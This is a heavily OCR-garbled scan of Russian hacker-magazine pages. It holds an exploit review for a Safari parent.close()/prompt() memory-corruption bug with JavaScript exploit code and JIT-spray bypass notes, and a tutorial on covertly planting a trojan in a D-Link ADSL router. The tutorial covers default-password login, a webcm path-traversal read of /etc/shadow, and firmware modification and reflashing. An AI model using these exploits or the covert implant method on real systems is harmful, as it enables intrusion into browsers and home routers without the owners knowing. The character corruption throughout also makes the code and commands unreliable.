обнаружил Кристиан Клосковски (Кгузбап Кіозкоѵѵзкі] и незамедли- 
тельно опубликовал эксплойт для последней версии яблочного брау- 
зера. Ответных действий от Арріе в виде патча пока не последовало. 



ЕХРЮІТ 



Эксплойт представляет собой обыкновенный НТМб-файл с 
баѵаЭсгірІ-кодом. Уязвимость кроется в методе рагепбсІозеО, 
который способен повредить память процесса, что в итоге может 
передать управление злобному шелл -коду. В примере Кристиана — 
шелл -код запускает калькулятор, но ты же понимаешь, что заменить 
шелл-код — дело пустяковое. Чтобы эксплойт работал удаленно, 
необходимо существование родительского объекта. Для этого в 
эксплойте предлагается первоначально использовать метод ѵѵіпбоѵѵ. 
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ЕХРШІТ5 

КЕѴІЕѴѴ 




5 




І\І_ѴІІ_ѴѴ 





ЕХРЮІТ5 

КЕѴІЕѴѴ 



о реп (], который откроет НТМІ_ с эксплойтом. 

А для этого нужно, чтобы у жертвы были раз- 
решены всплывающие окна. Фишка же са- 
мого эксплойта в том, что происходит вызов 
метода сІозеП для родительского объекта, 
а затем вызов метода рготрШ для того же 
объекта. Так как ра ген!- объект уже «закрыт», 
у 5аТа гі возникает «разрыв шаблона», то 
есть ошибка в памяти, в результате которой 
при обработке метода рготрШ происходит 
перезапись регистра Е5І значением, которое 
будет браться из ошибочного места. После 
записи регистра идет вызов по адресу из 
этого регистра — САН Е5І. Кристиан в своем 
эксплойте использует до вызова сІозеП 
еще пару вызовов рготрШ, чтобы «сдви- 
нуть» указатель Е5І для принятия значения 
0x40 Е00000 . Осталось подготовить шелл-код, 
чтобы он разместился по адресу 0x40 Е00000 . 
Тут вступает в дело классический Ьеар 
зргау, что приводит кзапол нению адресно- 
го пространства процесса, включая адрес 
0x40 Е00000, нашим шелл-кодом. Таким 
образом, жертва открывает страничку, видит 
окошко, сгенерированное методом рготрШ, 
пытается закрыть его по АЕТ+Е4, видит 
второе окошко, которое опять закрывает, 
и в результате — рѵѵпесі после сІозеП и уже 
не отобразившего окошка, третьего вызова 
рготрШ. 

Рассмотрим код эксплойта: 

//Функция генерит большую строку 

Типсбіоп таке_ЬиТ (рауіоаб , Іеп) { 
ѵЛііІе (рауіоаб . ІепдбЬ < ( 

Іеп * 2) ) рауіоаб. += рауіоаб; 
рауіоаб = рауіоаб . зиЬзбгіпд ( 

О , Іеп) ; 
геСигп рауіоаб; 

} 

ѵаг зйеіісосіе = ... //тут шелл-код 



/ * А тут вырезан Ьеар зргау — эконо- 
мия краски* / 

ѵаг а = рагепб; //указатель на ро- 
дительский объект 

ѵаг Ьиі = шаке_ЬиП ( "АААА" , 10000); 
//генерим строку 

^ог(ѵаг і = 0; і <= 1; і++) { //Экс- 
плойт, ошибка возникнет при втором 
проходе 

а . ргошрб ( аіегб ) ; 
а . ргошрб (ЬиП ) ; 
а . сіозе ( ) ; 

} 

Недостаток эксплойта в том, что 5а!агі у 
нас работает в режиме регтапепІ-ОЕР, и 
шеллкод из кучи исполняться не будет. Ком- 
пания ѴІб РЕ N разработала коммерческий 




ЕХРЫІТЗ 

РЕѴІЕѴѴ 



эксплойт, который обходит регтапепі-ОЕР. 
Ну, мы же кул-хацкеры — сделаем так, чтобы 
кроме О ЕР он обходил ещеиАЗЕР.Янезнаю, 
как сделали ребята из компании ѴІб РЕ N 
(догадываюсь, что с помощью РОР], но для 
АЗбР этого мало (в данном случае], поэтому 
я воспользуюсьтехникой ЛТ-5РРАУ и одним 
из шеллкодов, который я же и разработал 
(сам себя не похвалишь — никто не похвалит 
:)]. Мой шеллкод открывает блокнот. 

Итак, суть проста — заменяем Ьеар зргау 
(который, кстати, жестко палится антивиру- 
сами] на Л Т-5 Р РАУ. Но не все так легко, как 
казалось. Если вставить флеш-объект на 
туже страницу или даже на родительскую, 
то при вызове рагепЕсІозеО вся память, 
выделенная для ЕІазЬ, очистится. Тогда я 
придумал углубить цепочку «наследования». 
Первая страница грузит ЛТ-5РРАУ и делает 
открытие в новом окошке второй, вторая 
страница ничего не делает, кроме как откры- 
вает третью. А уже третья страница откры- 
вает четвертую — с эксплойтом, но без Ьеар 



зргау. Все страницы в 5а!агі — обрабатывает 
один процесс, так что память общая. Но 
адрес 0x40 Е00000 меня также не устраивает, 
кто читал мою статью про ЛТ 5РРАУ в апрель- 
ском ][, тот помнит, что нам нужен адрес вида 
ОхХХУУ0 1 01 , чтобы попасть в ЛТ-шеллкод. 
Немного побаловавшись с параметром, я 
нашел ситуацию, когда указатель Е5І пе- 
реписывается значением, генерируемым в 
качестве параметра метода рагепШ. 

ѵаг ЪиТ = шаке_ 

Ъи:Е (ипезсаре ( ' %и0101%и0943 ' ) , 

38000) ; 

Теперь мы можем передать управление по 
точному адресу. Я выбрал 0x09430101 . Там 
как раз наш шеллкод. Вот и все. 



50ШТЮЫ 



Решения пока нет. Разве что отключить 
Лаѵа5сгі рі- и Рор-Ібр окошки (а вот это в 
5а!агі уже сделано по умолчанию], т 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Сплцилльнве- предложения: 

ІРПРЙПІІ ИНТЕРНЕТ 

■ Паліпичгниѵ - а гіпб-аы нгсгѵ І4асц,*ы; ж М и і: ки п і:іа й »йл 
«Срок пюдкп’ЮЧіниѵ ■ Нассн - 14 днвгі, ш иог.ч.оьсн. 0 * аЬп. - йт 1 Д до 30 дмнА. 

• Ѵ^ІПНОѴРІ пріипіп ыпгігіцгі;лгп ггппфг.ч^агп н.пыс'ПИ 

■Ѵп«іѵчіиииіиь>9 

- В ыД а Л ■ ічгчы й П-нпНгі НіРГСрігйІ 
' Корпоративны* честны* с«гн (ѴР N 

'ІОЁТвіиГ, я йЛЛ-ц4нТр.й 

РДТ Теленом лѵѵт.ггмі.ги й-тйЦ]ЕпЬ@гтІ.ги (495) 9Ѳа-01Г2 

еі|іиг п-ашвс** п«і*цк*л иттс*. ичсгснцни опыт р-айпты * о&лас»и плтхіикуиняацн^ 
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ЗАРАЖЕНГЕЦр|500Т В ДОМАШНИХ УСЛОВИЯХ 

Привет, мой читатель! В этой статье я расскажу о замечательных АОЗЬроутерах - 
незаменимых в домашних и промышленных сетях железяках. Поведаю тебе 
о вопросе эксплуатирования этих железок в выгодных для нас целях - вшивании 
зверского троянца во внутренности маршрутизатора. И таким образом, чтобы это 
не заметил ни умный админ, ни ушастый юзер. 



ПОЖЕЛАНИЯ ИЛИ ТРЕБОВАНИЯ К Ю 

Когда я писал эту статью, то предполагал, что читать ее будет достаточно 
продвинутый юзер с установленным 6І\ИІ\І_іпих, который также имеет 
некоторые навыки работы и программирования в этой операционной 
системе. Однако представляется возможным повторить мои действия 
и на ѴѴіпсІоѵѵз (используя Судѵѵіп, например], но это описано не будет. 

Для получения максимального удовольствия необходимы также навыки 
владения паяльником (это уже опционально]. 

А НАЧАЛОСЬ ВСЕ... 

Что-то я отвлекся. Итак, все началось с того, как однажды зависла 
эта самая железка, точнее, она предательски оборвала соединение с 
интернетом и никак не хотела его восстанавливать. При этом находилась 
она далеко, физического доступа к ней не было (впрочем, что-то я за- 
врался — мне просто было лень встать с дивана с перезагрузить роутер 
:)), ѴѴеЬ-интерфейс не отзывался, но я вспомнил, что на этой штуковине 
должен быть Іеіпеі: или ззб. Заходить в зону администрирования я ранее 
не пробовал и опрометчиво не менял пароль к моей учетной записи (как 
оказалось позже, очень зря, ведь по дефолту он « а сі т і п : а сі т і п »] . Итак, я 
попробовал 55Н, и он работал! 

$ ззЬ абтіп@192 . 168 . 1 . 1 
$ Раззѵ\гогсН 

Как гром среди ясного неба! ВизуВох! Никогда не задумывался о том, 
под чьим управлением находится этот роутер, оказывается — 0І\ІІ)/І_іпих! 
Мне стало жутко интересно, как же здесь все работает, и, мысленно 
благодаря лень и случай, я пустился в исследование. 



СБОР ИНФОРМАЦИИ 

Итак, с чего я начал? Конечно, со списка доступных команд: 

# ЬизуЬох 

Сиггепкіу Ьекіпесі кипскіопз: 

[, азЬ, ЬизуЬох, сак, сЬдгр, сЬшоЬ, 

сЬоѵт, ср, Ьаке, ЬЬ, Ы, есЬо, каізе, кгее, 
дгер, Ьозкпате, ісЦ іксопкід , іпік, іпзтосЦ 
кііі, 1п, Іодіп, 1з, ІзтосЦ тксііг, тоЬргоЬе, 
тоипк, шѵ, раззтлгсі, ріпд, рз , ржі, геЬоок , 
гт, гттосЦ гоике, зЬ, зіеер, зупс, каг, 
кезк, кккр, коисЬ, кгие, кку, итоипк , мдек, 
ѵЛіоаті , уез 

Набор вполне вменяем, для нормального исследования и воплощения 
идей хватит. Следующим проснулся интерес к версии ядра: 

# сак /ргос/ѵегзіоп 

Ьігшх ѵегзіоп 2 . 4 . 17_шѵ121-ша1ка-шірз_кр_1е (гоок@ху) 

(дсс ѵегзіоп 2.95.3 

20010315 (геІеазе/МопкаѴізка) ) #1 ТЬи Бес 28 05:45:00 

С8Т 2006 

Для справки: МопІаѴізІа — дистрибутив, ориентированный на встраи- 
ваемые системы. Подавляющее большинство производителей сетевого 
оборудования отдают предпочтение этой системе. Ее можно найти и 
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> ТЩ 192.168.1.199 


220 


Р0РМ2 РТР Зегѵег геасіу. 


530 


Ріеазе Іодіп шііГі ІІЗЕР апсі Р055. 


тщ: 


ІІЗЕР асІат2 


тщ; 


РР55 асІат2 


тщ: 


ЗЕТЕГШ аиѣоі оасі 1 


-гщ: 


ЗЕТЕИУ аиѣоіоасі іітеоиѣ,8 


•гщ: 


ЗЕТЕГШ ту_і расМгеге, 192, 168, 1. 1 


т-щ: 


> Ьі п 


■гщ: 


> яиоіе МЕйІП ГЬЗН 


-гщ: 


> риі Гз.ітд "Гз.ітд т-Ы0" 


•гщ: 


> диоіе РЕВ00Т 


-Мір: 


> ди і Т 


Работа с роутером через РТР-сервер загрузчика 



ас1ат2 




Блок-схема чипа АР7 



на других устройствах, например, в электронных книгах или сотовых 
телефонах. 

Далее меня заинтересовала информация об архитектуре системы: 

# саі /еіс/ѵегзіопз 
СШТОМЕК=БЬіпкКІІ 
МОВЕЬ=Б8Ь- 5 О ОТ 

ѴЕКЗІСЖ=ѴЗ . 02В01Т01.Ш. 20061228 
НТМЬ_ЪАШ=Ш .3 02 
В0АКБ=АК7ѴІЛГ 
ѴЕК8ІСЖ_ІВ= 

С РІІАЕСН_ЫАМЕ = АЕ7 
МОВЕЬ_ІБ= 

Е38ТАМР=2 006122 8 0552 53 

# саі /ргос/сриіпіо 
ргосеззог 
сри тосіеі 
ВодоМІРЗ 

маіі іпзігисііоп 
тісгозесопсі Іітегз 
ехіга іпіеггирі ѵесіог 
кагдшхе маіскроіпі 
ѴСЕВ ехсерііопз 
ѴСЕІ ехсерііопз 

АР7 — это двухядерный чип, разработанный компанией 
Техазіпзігитепіз. Он содержит полноценный А05І_-роутер на одном 
чипе, поддерживающий стандарты А05І_1 , А05Е2,АП5Е2+. Основан 
на высокопроизводительном РІ5С процессоре МІР5 4КЕс, с тактовой 
частотой 175 или 233 (в зависимости от технологии производства: 18 мкм 
или 13 мкм). Чип содержит на борту 2 ЮАРТ-интерфейса, один из которых 
(ЮАРТ_А) используется для вывода отладочной информации, а также 
ЕЛАО-интерфейс, служащий для отладки (прошивки) ЕІазЬ-памяти. Об 
использовании этих интерфейсов будет рассказано далее. Напоследок я 
посмотрел сведения о памяти: 

# саі /ргос/тоипіз 
/сІеѵ/тІсІЫоск/О / ідиазіііз го 0 0 
попе /сіеѵ сіеѵіз ш 0 0 

ргос /ргос ргос ш 0 0 
гатіз /ѵаг гатіз гѵ7 0 0 



# саі /ргос/тіИ 



беѵ: 


зіге 


егазезІ 2 е 


пате 


тІсЮ : 


00341000 


00010000 


"тІсІО " 


тісіі : 


00090170 


00010000 


"тісіі " 


т!сі2 : 


00010000 


00002000 


"т1с12 " 



тІсІЗ : 00010000 00010000 "тВсіЗ" 
т!с14 : ООЗеОООО 00010000 "тВсМ" 

Естественно, не забыв про адреса блоков: 

# саВ /ргос/ВісВд/епѵ I дгер шВсІ 

тІсЮ 0х900а1000 , 0x903 В0000 

тісі.1 0x90010090, 0х900а1000 

тВс12 0x90000000,0x90010000 

тІсІЗ 0x903 В00 00 , 0x90400000 

тВс14 0x90010000 , 0x903 В0000 

Из вышеописанного следовало, что Еіазб-память (/беѵ/гтДбЫоск) имеет 
5 блоков: 

тІсІО — образ файловой системы ЭциазЬЕз. Это специальная файловая 
система, находящаяся в сжатом состоянии и доступная только для чте- 
ния. Для сжатия используется алгоритм дгір, но в данном случае — И2МА 
(коэффициент сжатия выше). Размер этого блока равен 4 Мб. 
тІсЛ — этот блок содержит ядро МопІаѴізІа в сжатом ИЕМА алгоритмом 
состоянии, размер блока 600 Кб. 

тІсІ2 — ВооНоабег АЭАМ2, выполняет загрузку ядра, так же имеет сер- 
висный ЕТР-сервер для восстановления и перепрошивки. Подробнее о 
нем будет сказано далее. Размер блока равен 64 Кб. 
тІсІЗ — поделен между конфигурационными данными и епѵігоптепі: (пе- 
ременные окружения) блоком, взглянуть на который можно в /р гос/Мд/ 
епѵ. Конфигурационные данные находятся в /еіс/сопЕд.хтІ. Посредни- 
ком между файловой системой блоком конфигурации является закрытая 
(как и все ст_*, управляющие, о них позже) программа стДодіс. Размер 
этого блока — также 64 Кб. 

тШ — здесь содержится сигнатура прошивки, ядро и образ файло- 
вой системы. Используется этот блок при обновлении прошивки через 
ѴѴеЬ-интерфейс. Первоначально она складируется в этот блок, потом 
проверяется контрольная сумма и, если сходится, записывается на свое 
новое место. 

Оперативная память (в этой модели размером 16 Мб, но А0АМ2 в 
этой модели видит только 14 Мб, лечится обновлением), смонти- 
рована к директории /ѵаг, и ее спокойно можно использовать в 
наших целях: 

# Ігее 

Іоіаі изеб. Ігее зкагеб Ъиііегз 

Меш: 14276 10452 3824 0 

Не забудем пробежаться по списку процессов. Из интересных здесь 
затаились демоны: іШрб — ѴѴеЬ-зегѵег; бргоху, кэширующий 0Ы5 
запросы ргоху зегѵег; ббпзб — 0Ы5 баетоп; рррб... -собственно 
баетоп, реализующий подключение по протоколу РРР, а в пара- 
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я св^ /йеѵ/ілійыоск/© > /мг/ізлщ 



ѵдеі *ѵНр://і92Л68.ІЛ/1 г &Лгч 

> пкгі І Г I гпргкгкнсі _ ^5 

:> Г^.ігіц ипрйскегі_ , Г5 

:> ср ПеП ипраскей_ , Ра/Ізіп 

ч/ і п ипрлскиІ_ /ріс/ргпдгіі? ^5 .нпі 



Получение и распаковка прошивки 



> пк?дм*&Ь^5. ипрн&нІ_Т5 гау.ІБ. ірд -псзрр^гіс! 

> ИтІІіл4 ч -іі "У и ччпЬаІеИ р У№№ 

1 ей /ѵаг 

* идеі Ііѣ1р:/ПП.Ш.І.2/нц_-ГЕ^тд 
ц слі «тиу ^5 ітд > /сІеѵ/ті.й&Іоск/Ѳ ІІ геьоо* 

« ИѵІ 1 

Рівік? Ге-есІ . К а ] I Ререаі 



Копирование прошивки на роутер и проба 
изменений 



№пдр ссап герог* $ог 10.52.Ѳ 194 
Наві І5 ир С 0.0405 I пірпсу) . 

Ноі §НіруП. С I 05(0 б рог* 5 

РОРТ 5ТПТЕ 5ЕЕШІСЕ УЕВ5ІРН 

23/іср орел іеіпді О-Ипк 051 гоиіег іеіпдігі 

ѲѲ/іер орел пир О-ипк 05і- гои гег пир соп^ід 

Бег у і се [ п * о : Ре ѵ і се ■ г л ц* ег 



Нтар спокойно определяет модель роутера 



+ р* «-■ 

г\і иы 


М ігг ! 


1 ■ 1 


| гл* ч 


!?й* Ь 


|пП 


7 Г.ѴУІ 


3 


Г к МП І $| 


□ Г*СІ 


Р. 


СкмГ||го*,ті 


А ГИГІ, 


5 


ЕЬкмрйЗ 


5 ГйН 


4 


ЕНІІігіР.І 


Л гдаі 


4 


ЕьіртФЬйЛІ 


? гскі 






71 


1 


.■Чжг.'Ышія.рс 


а Ч гні 


1 


^шг/-іА1гѴі1і к> 


ІИ '■МС 


э’тіе 5 


І м Г 


К г «.г 


ЭПЬ ^ 


■ .+-.пігъп« -■ -г /*ссадя , *'іс- *І 


ЪЯ 


11 ІН І 




41 г іліі 


ІМ і 


ч /рі:/гкч.зіч іетпГ -0 


71 ГВйС 


ил і 


/ьЖ/ШІП/ЁМІ 


И-1 


1 


Ц\щіп дам Ч4І цчіллм ■Г**' ***• рн^ѵ-1 


Л41 


т г 





Список процессов запущенных на роутере 



метрах мы видим данные учетной записи. Итак, если роутер не 
прикидывается шлангом (читай — не находится в режиме Ьгісіде], то 
можно с легкостью заполучить учетную запись. 

Программы ст_* являются закрытыми и в состав исходных кодов 
входят уже скомпилированными (эти программы — также разработка 
Техазіпзігиппепіз, на О-Ыпкза несоблюдение лицензий ругаться не 
стоит]. 

ст_Іодіс _ программа управляющая логикой работы системы, через 
нее проходит конфигурация; производит синхронизацию /еІс/сопГід. 
хті с соответственной частью содержимого /сІеѵАісбд (указывающего 
на тІбЗ]. 

ст_сІі — интерфейс командной строки для управления и конфигурации 
системы. Например, настройки подключений производятся через этот 
интерфейс. 

ст_рс — выполняет запуск и мониторинг процессов, связи с правила- 
ми (например, запускать программу какдемон, также в правила входит 
информация об открываемых портах] описанными в Мс/ргодіМз.хтІ; 
загружается сразу после ядра. 

ѵѵеЬспл — СОІ-интерфейс, дыряв, например позволяет взглянуть на /е\ с/ 
збасіоѵѵ, просто обратившись по ЭНЕ. 

ТШСр : // 192 . 168 . 1 . 1 / . ./. ./. . /екс/зЬаскж 

Ничего не получил, ШНрсІ не так прост, а вот если так: 

ТШСр : // 192 . 168 . 1 . 1 /сді-Ъіп/тлгеЪст?декраде=/екс/з]тас 1 сж 

Другое дело. Это можно использовать для сбора информации, если нет 

доступа к ззНЛеІпеІ, но есть доступ к ѴѴеЬ- интерфей су. 

бгтѵѵагес^д — используется для прошивки через ѴѴеЬ-интерфейс. На 



вход этой программы, Р05Т-запросом из ѴѴеЬ- интерфейса передается 
образ, а она уже перенаправляет к РІазЬ-памяти, предварительно про- 
верив контрольную сумму образа. 

На этом сбор первичной информации закончен, пора переходить к 
решительным действиям. 

УСТАНОВКА СРЕДСТВ РАЗРАБОТКИ 
И КОМПИЛЯЦИЯ ПРОШИВКИ 

Прошивки роутеров О-Ыпк (да и всех остальных, основанных на 6 N11/ 
І_іпих] распространяются под лицензией 0Р1_, получить их можно на 
официальном РТР-сервере. На самом деле можно выбрать любую из 
списка предложенных прошивок, они одинаковы (касательно Т-серии). 

В поставке — исходники ядра, окружения, необходимых инструментов 
и Тооісбаіп для разработки/компиляции существующих программ. Его 
следует распаковать в корень и добавить в переменную окружения РАТН 
путь до Ьіп-директории Тооісбаіп'а: 

$ Саг хѵ 1 СооІз.Сдг 

$ ехрогС РАТН=$РАТН: /орЦ/<Соо 1 с]таіп_ра 1 і]т> 

Теперь, чтобы скомпилировать свою собственную прошивку, заходим в 
директорию с исходными кодами и выполняем этот самый таке. 

$ ссі БЗЬ/ТУЬіпихѴЗ/згс && таке 

Будет заданно множество вопросов о включении поддержки устройств 
(лучше ответить на них положительно]. По окончании компиляции в 
директории ТУЫпихѴЗ/ітадез будут созданы образы прошивки. Также 
можно запустить скрипт, одноименный с твоей моделью из директории / 
ТѴипііхѴЗ/згс/зсгіріз. 

Пару слов о передаче файлов между роутером и компьютером. Самый 
первый способ, который я применил — возможность передачи файлов 
по протоколу 55Н, используя для этого программу зср. Но чуть позже я 
узнал, что тс (МібпідЫ: Соттапбег] также имеет возможность соеди- 
няться по 55Н (Рапеі ЗЬеІІ соппесбоп]. Как вариант, можно поднять 
на своем рабочем месте ѴѴеЬ- или РТР-сервер. Позже я отдал предпо- 
чтение ѴѴеЬ-серверу, ибо работает он наиболее резво. Установил я {ЫТрсІ, 
маленький и быстрый, как и на роутере. Запускаем у себя и стягиваем 
на роутер файл, предварительно перейдя в директорию /ѵаг (она, как 
говорилось ранее, доступна для записи]. 

$ СТШСрсІ -д -Ы -/РогКоиСег -и изег -р 8080 

# ссі /ѵаг 

# мдеС кЦЦр: // 192 . 168 . 1 . 2 / 1 і 1 е 

Чтобы стянуть файл с роутера, можно также поднять ѵѵеЬ-сервер: 

# СНШСрсі -д -Ы /ѵаг -и гоок -р 8080 

Обрати внимание, если ты хочешь скачать с роутера исполняемый файл, 
следует убрать права на запуск. При скачивании большого количества 
файлов с роутера лучше использовать тс, не нужно будет предвари- 
тельно копировать файлы в /ѵаг и убирать права, а после — удалять эти 
файлы для освобождения места. В общем, дело вкуса, выбирай любой 
вариант, который тебе удобен. 

СОЗДАНИЕ СВОЕЙ ПРОГРАММЫ 

Начнем, конечно же, с классики программирования — НеІІоѴѴогІсІ. 
Каких-то особых правил нет. Текст программы до боли знакомый: 

#іпс 1 ис!е <зСс 1 іо.Ъ.> 

#іпс 1 ис!е <зкс 11 іЪ.Ъ.> 

іпС шаіп(ѵоісі) 

{ 

ргіпСІ ( "Маке . Реесі. КІИ . КереаС . " ) ; 
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Разъем ЛАѲ 



гекигп 0; 
} 




Работа с роурером через ЛА6- 
интерфейс 

<пате>Ье11</пате> 
<ракЬ>/Ъіп/Ье11</ 
паше> 

</ргодгат> 

Сохраняем и запаковываем 
обратно: 




Схема ЛА6-адаптера 



Компилируем (путь до Ьоісбаіп'а должен быть указан в 
переменной окружения РАТН): 

$ шірз_^р_1е-дсс Ьеіі.с -о Ьеіі 



$ шірз_^р_1е-зДгір -з Ьеіі 

Далее, копируем программу на роутер в директорию /ѵаг, 
устанавливаем права на запуск и запускаем: 

# ей /ѵаг 

# сЬтой +х Ьеіі 

# . /Ьеіі 

И... ничего не произойдет, либо вывалится оповещение раіЬ 
по! іоипсі. В чем же дело? Я ранее уже говорил про ст_рс — 
эта программа запускает другие в соответствии с правила- 
ми, описанными в Мс/ргодбеІБ.хтІ. Вот и пришло время 
модифицировать и прошивать образы файловой системы. 

МОДИФИКАЦИЯ ФАЙЛОВОЙ СИСТЕМЫ 

Для того, чтобы модифицировать файловую систему, ее для 
начала надо распаковать. Как я уже упоминал, файловая 
система здесь — ВциазЬРз с патчем І_2МА. В пакет для раз- 
работки прошивок входит только програма ткзциазЫ'з (для 
создания образа], ипзциазЫ'з (для распаковки) отсутствует. 
Но это не беда, все доступно на сайте файловой системы, 
нужна нам именно первая версия. Наложив І_2МА-патч и 
собрав ^дилиты, откладываем их в удобное место. Для на- 
чала получим образ файловой системы с роутера: 

# сак /йеѵ/ткйЫоск/0 > /ѵаг/кз . ітд 

И скачать удобным способом. 

Далее, распаковываем образ: 

$ ткйіг ипраскесЩЕз 
$ шізсдиазМз кз.ітд ипраскей_кз 

Теперь можно модифицировать как угодно, а угодно нам 
скинуть РискТЬеѴѴогІсІ в директорию /Ьіп и добавить прави- 
ло для запуска в /еіе/ргодбеіз.хті. 

$ ср Ьеііо ипраскей_Тз/Ьіп 
$ ѵіт ипраскей_Тз/екс/ргодйеТз .хті 

А добавляем вот что (между тэгами <ргодбеі : 5></ргодсІеі : 5>]: 



$ ткзсдиазМз ипраскей_кз ту_Тз.ітд -поаррепй 

Следует обратить внимание, что образ файловой системы 
не должен превышать допустимых размеров. Если тебе 
приспичило что-то срочно испробовать, и оно не поме- 
щается, удали из образа что-нибудь «ненужное» вида дгер, 
ѵѵбоаті, или же воспользуйся упаковщиком исполняемых 
файлов ИРХ. Теперь загружаем на роутер образ и переходим 
к следующему разделу. 

ЗАПИСЬ ОБРАЗА ФАЙЛОВОЙ СИСТЕМЫ 

Способ прошивки роутера очень прост, заключается он в 
обращении к устройству /беѵ/тіЬЫоск/*. Итак, заливаем на 
роутер любым удобным способом образ файловой системы 
и производим сие нехитрое действие: 

# сак ту_кз.ітд > /йеѵ/ткйЫоск/0 && гейоок 

или 

# ср ту_Тз.ітд /йеѵ/ткйЫоск/0 && гейоок 

Через некоторое время, когда пройдет процесс записи, 
роутер перезагрузится, и изменения вступят в силу. Пробуем 
запустить наш пример: 

# Ьеіі 

Маке . Реей . Кіі 1 . Кереак . 

Получилось! Превосходно. Идем дальше. 

СПОСОБЫ ВОССТАНОВЛЕНИЯ В СЛУЧАЕ НЕУДАЧИ 

Прежде чем прошивать роутер более серьезными «подел- 
ками» следует узнать, как же действовать в критических 
случаях, когда маршрутизатор отказывается загружаться. 
Безвыходных ситуаций нет. На помощь приходит АРАМ2 
РТР-сервер. Для начала следует запустить РТР-клиент на 
ІР-адрес АРАМ2, который можно подглядеть в /ргос/іісід/ 
епѵ (параметр тущрасісігезз]. 

Далее следует включить роутер с зажатой кнопкой гезер и 
через некоторое мгновение появится приглашение. 




НТТР://ѴѴѴѴѴѴ 

1Г 

> Ііпкз 

Материалы, 
посвященные МІР5- 
и АБАМ-архитектуре: 

• Ір.сШпк.ги/риЬ/ 
АРЗБ/бРР зоигсе 
собе/ 

• зепзі.огд/%7Еа[ес/ 
тірз/абат2 арр.ідг 
[апдепз.еиЛіт/еа/ 
тірз еп.рбр 

• тге.иібабо.еби/ 
тгс/реорІе/фіУбідкаІ./ 
М I Р5і г. Ыт I 

• тірз.сот/ргобисіз/ 
ргосеззогз/Ьагб-ір- 
согез/4кес-Ііагб-ір- 
согез/ 

• гоиіеНесЬ.огдб 



<ргодгат> 



$ ккр 192.168.1.199 
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220 АБАМ2 РТР Зегѵег геаЛу. 

53 0 Ріеазе Іодіп Ш-Ыт ЮЗЕК апсі РАЗЗ. 

Для наглядности можно включить отладочный режим, тогда будут выво- 
диться вся информация и все ответы РТР: 

ТСр> сЗеЬид 

Логин/пароль — асІат2/асІат2. Процесс перепрошивки очень прост. Для 
начала переводим сессию РТР в бинарный режим: 

ТСр> Ьіп 

Далее выбираем РІазЬ-память для записи: 

ТСр> сдиоСе МЕБІА ЕЬЗН 

Теперь отправляем, например, образ файловой системы и указываем 
место назначения: 

ТСр> ртШ Тз.ітд "Тз.ітд тСсЮ " 

Ждем окончания записи, перезагружаем роутер, выходим из сессии: 

ТСр> фіоСе КЕВООТ 
ТСр> сдиіЦ 

Все! Как видишь, нет ничего сложного, теперь если что-то пойдет не так, 
ты всегда можешь исправить ситуацию. 

Для удобства работы, следует дать нормальный ІР-адрес, включить авто- 
матическую загрузку (чтобы с гезеРом не плясать] и немного увеличить 
время ожидания подключения перед загрузкой ядра. Все эти параметры 
хранятся в переменных окружения, есть специальные команды РТР 
А0АМ2: СЕТЕІМѴ и 5ЕТЕІЧѴ (для получения и установки переменной соот- 
ветственно]. В сессии РТР вводим следующие команды: 




Фотография ІІАВТ-интерфейса 

запускается, и нет доступа к А0АМ2? Выход есть — ЛТАѲ, а точнее, в 
этом чипе присутствует ЕЛА6 (расширенная версия]. Это интерфейс для 
внутрисхемной отладки\программирования. 

Для подключения к этому интерфейсу нам понадобится ЕРТ-порт ком- 
пьютера, разъемы и 4 резистора. Схема простейшая. 

Спешу заметить, что прошивка через ЛАС — дело не быстрое, займет 
достаточно много времени. Так что использовать стоит только для 
восстановления загрузчика, если даже он не работает. Для общения 
по ЛАС следует использовать специальную программу, например 
ІІгЛАО. Ниже приведен пример работы по этому интерфейсу. Уста- 
новка СВЯЗИ: 

Лад> саЫе рагаііеі 0x37 8 ББС5 
Лад> сІеБесБ 

Обнаружение ЕІазЬ-памяти: 

Лад> сІеДесСОазЪ. 0x30000000 1 

Чтение ЕІазЬ-памяти: 



1Бр> ЗЕТЕБѴ аиСоІоасІД 

1Бр> ЗЕТЕБѴ аиСо1оас1_ЦітеоиР , 8 

1Рр> 8ЕТЕРГѴ ту_ірас!с1гезз ,192 . 168 . 1 . 1 

1Рр> <диоСе КЕВООТ 

1Рр> сдиіБ 

Роутер перезагружается и можно зайти на АБАМ2 по 1 92. 1 68. 1.1:21 . Если 
появится желание перепрошить образ ядра, и ядро откажется загру- 
жаться, РТР запустится сам. Перед прошивкой модифицированными 
образами обязательно следует сохранить текущие для восстановления. 
Вообще, сменить переменные окружения можно и через /ргосДісбд/епѵ, 
мне просто захотелось рассказать больше о работе с РТР 

# есЬо шу_ірасЗ<ігезз 192.168.1.1 > ргос/СісІд/епѵ 

А проверить изменения можно так: 

# саі/ргосЛіс^д/епѵ I дгер ту_ірасІсІге55 

Что делать, если ты захотел попробовать перепрошить загрузчик, и как 
действовать в случае неудачи? Либо роутер по каким-то причинам не 



^'Сад> геасЗшеш 0x30000000 0x400000 ЩІШазЬ. ішд 

Запись в память (загрузчика]: 

ЗСад> НазЬшеш 0x30000000 асіат2 . ітд 

Полезно также знать об ІІАРТ-интерфейсе (ранее я обещал о нем рас- 
сказать). В ІЭАРТ_А отчитывается, то есть ведет лог загрузчик (на ранней 
стадии загрузки с ним можно и пообщаться] и ядро. При написании 
модифицированных ядер это незаменимо для отладки. ІЭАРТ — ІІпіѵегзаІ 
АзупсЬгопоиз Весеіѵег/ТгапзтіЛег (универсальный асинхронный 
приемопередатчик] почти всегда присутствует на микроконтроллерах. 
Схема адаптера очень проста. Базируется лишь на одной микросхе- 
ме — преобразователе уровней ТТІ_: МАХ232 для СОМ и ЕТ232П для 
115В. Микросхемы достаточно распространены и проблем с покупкой 
не будет. 

Схема собирается на макетной плате (которую спокойно можно поме- 
стить в корпус разъема СОМ-порта] за 20 минут и приносит море пользы. 
Например, при отладке ядра это абсолютно незаменимое решение. А 
если с электроникой туго? Выходом являются ІІ5В-шнуры для старых 
телефонов, на них как раз стоит преобразователь БАВТ — Б5В. 
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< 50ГѴ І СѲ> 

-о- <пат0>55Іп</пат0> 

234 0 О - ’ <епаЫе>уе5</епаЫе> 

235 0 0 - ‘ <ргоѣосо1 >ѣср</ргоѣосо1 > 

236 0 0 — <рогѣ>22</рогѣ> 

< 1 І 5ІеП>0 . 0 . 0 . 0< / 1 І 5І10П> 

<тан>2</тах> 

<ргодгат>с1г0рЬ0аг</ргодгат> 

240 0' < / 50ГѴІ С0> 

241 0 <ргодгат> 

242 0 0 <пат0>І~і01 1</пат0> 

